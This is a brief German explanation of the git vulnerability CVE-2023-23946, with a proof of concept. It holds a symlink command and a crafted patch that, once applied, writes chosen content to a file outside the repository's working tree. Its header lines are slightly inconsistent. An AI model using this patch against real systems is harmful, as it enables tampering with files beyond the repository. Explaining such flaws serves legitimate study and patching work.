
Erklärung und POC des CVE-2023-23946
Erklärung und POC der CVE-2023-23946
Die Schwachstelle CVE-2023-23946 wird durch einen Fehler in der Art und Weise verursacht, wie git symbolische Links behandelt. Wenn git einen symbolischen Link erstellt, behandelt es diesen nicht wirklich als symbolischen Link, und dadurch können wir ihn ausnutzen, um auf Dateien außerhalb des Arbeitsverzeichnisses zu verweisen.
ln -s [PATH_YOU_WANT_TO_ACCESS_OUTSITE_WORKING_TREE] symlink
diff --git a/symlink b/newsymlink
rename from symlink
rename to newsymlink
--
diff --git /dev/null b/newsymlink/spawn
new file mode 100644
index 0000000..e47f4ea
--- /dev/null
+++ b/newsymlink/[FILE_OUTSIDE]
@@ -0,0 +1 @@
+[WHAT_YOU_WANT_INSIDE_THE_FILE]
\ No newline at end of file
Was bewirkt der Patch? Wir ändern den Namen des vorhandenen symbolischen Links und erstellen eine neue Datei. Auf diese Weise wendet git seine Schutzmechanismen gegen symbolische Links nicht an, wenn wir /newsymlink/[FILE_OUTSIDE] ändern.